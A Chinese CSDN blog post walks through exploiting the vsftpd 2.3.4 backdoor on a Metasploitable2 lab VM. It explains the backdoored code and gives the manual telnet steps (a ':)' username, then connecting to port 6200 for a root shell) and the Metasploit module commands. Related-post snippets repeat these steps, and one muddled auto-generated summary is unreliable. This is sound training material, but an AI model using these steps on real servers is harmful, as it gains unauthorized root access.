vsftpd_234漏洞利用

最新推荐文章于 2024-05-10 22:24:53 发布
最新推荐文章于 2024-05-10 22:24:53 发布
阅读量4.6k 收藏 11
点赞数 1
文章标签: Metasploitable vsftpd漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/echoonly1999/article/details/88353599
版权

vsftpd漏洞利用

sybg写着不合心意,在这里记录下(划掉)
分为三部分:
1. vsftp服务
2 .漏洞代码
3.漏洞利用的两种方式

vsftp服务

Metasploitable2使用指南
Metasploitable2在21端口上运行着vsftpd服务,一个使用广泛的FTP服务。这个特别的版本包含一个后门允许一个未知的入侵者进入核心代码。这个后门很快就被确认并且移除。但是移除之前已经被少数人下载下来如果在发送的用户名后面加上” ?“(笑脸符号),这个版本的后门会在6200端口上打开一个监听的壳。我们可以通过远程登录确认或者通过Metasploit的上面的攻击模块自动攻击。

VSFTPD v2.3.4 漏洞代码

(来自即刻安全)
我们来查看下 VSFTPD v2.3.4 这个存在漏洞版本的代码,问题出在哪。这里令人惊讶的是,该源代码没有做任何混淆加密,我们很容易就能读懂和知道它的工作原理。我在?Pastebin 复制了这段验证漏洞的代码,在这个链接可以复制:http://pastebin.com/AetT9sS5 。下面的代码验证了用户名上的用户输入:
Alt
可以看到第 37 和 第 38 行在检查用户输入时,后面分别跟了 0x3a 和 0x29 这两个十六进制数,而它们则分别表示 :和 ) 。当用户名包含了这两个字符,那么接下来就会执行 vsf_sysutil_extra 这个函数。让我们看看该函数所执行的内容:
Alt
在代码的第 79 行 “struct sockaddr_in sa”,可以看出这里构造了一个名为 sa 的网络地址。The structure is defined by the which is set to the constant AF_INET, sin_port (6200) and the client address set to any on line 83, 84 and 85.对该构造则分别在第 83,84,85行,定义了常量 sin_family 值为 AF_INET, sin_port (6200) 及 客户端地址为任意地址。按照使用的代码结构来设置绑定 socket和 socket 用于传入连接的侦听进程。由于该段代码运行于服务器端,因此服务器设置了,可被攻击者远程连接的 socket 和侦听。代码的第 94 行提供了一个 shell 让任何人,都可以连接到该服务的 6200 端口上。

漏洞利用的两种方式

1. 手动利用

现在我将用手动的方式,来利用 Metasploitable 2 VSFTPD 这个漏洞程序。我将使用一个“笑脸”,来进行用户名的验证。这里假设你的 Metasploitable 2 虚拟机安装和运行了该服务。我们使用如下命令:

telnet [Metasploitable IP] 21

接着我们再输入以下命令:

USER user:)

PASS pass

当成功执行以上命令后,我们打开 nmap 扫描端口 6200 ,我们可以看到那段恶意代码已经被成功执行,并且 6200 端口也已被成功开启侦听。
Alt
我们通过以下命令来连接 6200 端口:

telnet [Metasploitable IP] 6200
Alt
当我们使用 id 命令后,从返回信息我们可以得知,当前我们已经取得了 root 的权限。

2. 使用 Metasploit工具

打开靶机(登陆用户名:msfadmin 密码:msfadmin),查看靶机的IP地址。命令:ifconfig
在这里插入图片描述
渗透机Kali Linux(登陆用户名:root 密码:*******)查看其IP地址。
命令:ifconfig
在这里插入图片描述
运行Metasploit下的msfconsole.
Msfconsole的好处:
(1)这是唯一办法访问大多数支持在Metasploit特点。
(2)console-based界面提供了一个框架。
(3)含有最具特点的和最稳定的无国界的界面。
(4)充分readline支持tabbing以及命令完成。
(5)在msfconsole外部命令的执行是可能的。
在这里插入图片描述
搜索vsftpd漏洞利用插件。
命令:search vsftpd
在这里插入图片描述

加载vsftpd漏洞利用的插件。
命令:use exploit/unix/ftp/vsftpd_234_backdoor
在这里插入图片描述
查看需要设置的参数。
命令:show options
根据Show option查看该模块的配置选项;可以看到只需设置目标主机的IP及端口号即可,默认为21端口
在这里插入图片描述

设置靶机IP地址,命令:set rhost 靶机IP
执行溢出
在这里插入图片描述
查看靶机内核与当前登录用户
在这里插入图片描述
查看下植入shell的运行服务权限,当我们所利用的VSFTPD v2.3.4 服务,是以 root 权限运行的,那么我们也将会是 root 的权限。

听到涛声2.0
关注
  • 1
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
FTP服务后门利用 - vsftpd_234_backdoor(笑脸漏洞)
星虐
02-03 2911
vsftpd_234_backdoor(笑脸漏洞) 攻击机和受害机的IP kali: 192.168.75.130 Metasploitable2 - Linux: 192.168.75.128 方法一: 1.测试其流通性 2. 扫描受害机的服务信息 3. ftp连接受害机,用户名加上笑脸符号 :) 密码任意 注意(在输入密码回车后会有停顿,记住不要关闭ftp连接) 4. 此时扫描到受害机会反弹一个6200端口 5.使用 nc 连接会发现是root权限 笑脸漏洞利用成功.
vsftpd FTP Server lsc远程拒绝服务漏洞
07-03
vsftpd是Very Secure FTP daemon的缩写,是UNIX类平台上安全的FTP服务器。 vsftpd在处理ls.c时存在远程拒绝服务漏洞,远程攻击者可利用此漏洞造成受影响应用程序崩溃,拒绝服务合法用户。
Ftp笑脸漏洞VSFTPD 2.3.4)复现(后门漏洞
最新发布
m0_62670778的博客
05-10 601
使用nmap扫描靶机的IP地址,可以看到靶机的21端口开放,且使用了VSFTPD,版本为2.3.4。nmap扫描端口6200,观察端口打开情况:已经开启。连接6200端口,成功以root身份登入。,连接靶机的21端口,输入user带有。选项是我们需要设置的,已经设置了,还需要设置。
Vsftpd2.3.4-端口渗透 6200 irc_3281_backdoor
旺仔Sec&blog
07-24 302
Vsftpd2.3.4-笑脸注入
vsftdp 2.3.4 服务漏洞
qq_56889067的博客
11-16 644
使用nmap -sV IP 查看服务。 根据扫描发现21端口开启vsftpd 2.3.4 直接使用msf 中vsftpd_234模块进行渗透。 调用此模块后直接 exploit 进入靶机、权限为root权限。 或者使用笑脸漏洞进行渗透,使用ftp ip 进行远程 在回显要求输入用户名时,随便输入用户名后面加上:)、密码也随即输入 ,成功后他会卡在这个页面没有回显。在另外开启一个终端开启一个终端,输入nc IP 加上6200端口 笑脸漏洞的固定端口是6200 端口 。 ...
metasploit利用vsftpd漏洞获取root权限
weixin_34292287的博客
07-26 271
vsftpd version 2到2.3.4存在后门漏洞,攻击者可以通过该漏洞获取root权限。这 里用backtrack 集成的metasploit做测试,metasploit集成了各种各样的漏洞,我们可以在上面利用服务器、个人PC和应用程序的漏洞。开始菜单路径 backtrack/Exploitation tools/Network Exploitation tools/Metaspolit ...
Vsftpd后门
qq_54713392的博客
05-09 671
Vsftpd后门 打开msf,使用search查找vsftpd模块,使用use调用该模块 连接metasploitable的ip地址,使用set rhost IP地址 使用run执行,生成shell
vsftpd-faq.rar_vsftpd_vsftpd FAQ
09-23
linux 下的vsftp的faq 的中文版说明。很详细。
vsftpd_3.0.3-3ubuntu2_amd64.deb
02-26
ubuntu系统离线安装vsftp包,也就是大家经常说的ftp安装包
vsftpd_3.0.3-3ubuntu2_amd64-fiona
03-02
vsftpd,ubuntu; 解压后将包上传服务器,执行dpkg -i vsftpd_3.0.3-3ubuntu2_amd64.deb就可以
vsftpd_rpm.zip
04-25
vsftpd的rpm包
vsftpd-3.0.3.zip
05-14
最近XX公司对我们服务器进行漏洞扫描发现vsftp存在漏洞, 因此需要到vsftpd官网去下载源码编译安装,好不容易才拿到,和大家分享。 附件包括PGP签名文件。 vsftpd-3.0.3.tar.gz SHA256 :9d4d2bf6e6e2884852ba4e69e157a2cecd68c5a7635d66a3a8cf8d898c955ef7 vsftpd-3.0.3.tar.gz.asc SHA256 :8250f7e249c3b298760ce0308fb1fefccbd1a9aed4c30f9e75276c09e5164118
vsftpd 2.3.4 带漏洞版本 可复现
09-26
vsftpd 2.3.4 带笑脸漏洞版本 可复现
CentOS 8.2学习笔记之FTP(1)安装vsftpd
没有标题,只有问题
07-31 554
CentOS 8.2自带的FTP服务名为vsftpd,意思是:very secure FTP deamon,非常安全的FTP进程。 因为是系统服务,所以安装、调试,都需要在root用户下。 1、查看一下是否安装了vsftpd yum list installed | grep vsftpd 如果安装了的话,会有如下提示,否则就是没安装 2、如果没有安装的话,查看一下vsftpd的安装包名称 yum search vsftpd 3、从上图中可以看到,vsftpd的安装包名称为vsftpd.x86_64
Python制作vsftpd2.3.4的exp和poc
xiaobaihack_doge的博客
02-11 316
Python是一门优秀的脚本语言,目前在网络安全领域被广泛使用,一些exp(漏洞利用程序)程序都是由Python做的,本次我们将用Python写一个exp和poc(漏洞验证程序)。关于vsftpd2.3.4程序,这是一个在Linux上的ftp软件,允许其他设备通过ftp连接,但是这个软件存在一个高危漏洞,当用户名或密码含有:)字样时,会在本机开启一个提供shell的6200端口,因此被称为"笑脸漏洞”。exploit-db上的exp。
FTP(匿名登录)未授权访问VSFTPD2.3.4漏洞渗透
weixin_52347768的博客
05-05 9490
漏洞扫描考察论文
笑脸漏洞(VSFTPD2.3.4)复现
aarong的博客
11-01 7969
笑脸漏洞(VSFTPD2.3.4)复现 漏洞服务:VSFTPD 2.3.4,俗称笑脸漏洞。存在于这个2.3.4版本,属于开发者设计上的失误。在检测到用户名带有特殊字符:)时,会自动打开6200端口。 攻击机:kali linux 靶机:Metasploitable2 复现过程 Nmap扫描同网断的靶机,观察靶机上的服务开放情况: nmap 192.168.43.0/24 发现靶机开放了21端口(Ftp协议),Nmap扫描出FTP服务的版本信息,扫描结果显示ftp服务版本为VSFTPD 2.3.4
VSFTP 2.3.4(笑脸漏洞)漏洞详解
m0_64593235的博客
04-18 1721
VSFTPD 2.3.4(笑脸漏洞)漏洞详解
靶机渗透(五)——metasploitable2
qq_45751902的博客
04-29 5679
目录一、简介二、信息收集三、端口渗透6667-irc21弱口令 一、简介 metasploitable是一个Ubuntu-Linux虚拟机,用于测试常见漏洞。本质上是一个盒子中的渗透测试实验室,提供了执行渗透测试和渗透研究的安全场所。 靶机下载地址 用户名是 :msfadmin 密码是: msfadmin 二、信息收集 nmap -sS 192.168.92.0/24 开放了好多端口 三、端口渗透 启动msf msfconsole 6667-irc 登录msf search irc 找到对应得
vsftpd漏洞利用
09-03
vsftpd漏洞利用是指利用vsftpd软件中的漏洞来获取未授权访问或执行任意代码的能力。在进行vsftpd漏洞利用之前,需要进行一些配置和准备工作。 首先,需要复制vsftpd的主配置文件到/etc目录,并配置相应的设置。可以使用命令"cp vsftpd.conf /etc"来复制主配置文件,然后根据需要进行修改。此外,还需要复制PAM认证文件到/etc/pam.d/ftp目录,可以使用命令"cp RedHat/vsftpd.pam /etc/pam.d/ftp"来实现。 接下来,需要进行漏洞利用的脚本设置。可以使用类似于"print "Use: ./vsftpexploit.py [target IP] [target Port]"的命令来指示使用漏洞利用脚本,并提供目标IP地址和端口号作为参数。 然而,在进行vsftpd漏洞利用之前,可能会遇到一些问题。例如,进入vsftpd目录后,可能需要赋予文件权限,并进行make和make install操作。然而,如果系统中没有安装gcc编译器,可能会导致报错。这时,需要先安装gcc编译器,以解决此问题。 综上所述,vsftpd漏洞利用是指利用vsftpd软件中的漏洞来获取未授权访问或执行任意代码的能力。在进行漏洞利用之前,需要进行一些配置和准备工作,并确保系统中安装了必要的工具和依赖。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [Vsftpd2.3.4环境搭建-漏洞利用(笑脸漏洞)](https://blog.csdn.net/qq_34914659/article/details/119534938)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* [Python学习之重构vsFTPd后门漏洞详解](https://blog.csdn.net/qq_32506555/article/details/54604194)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值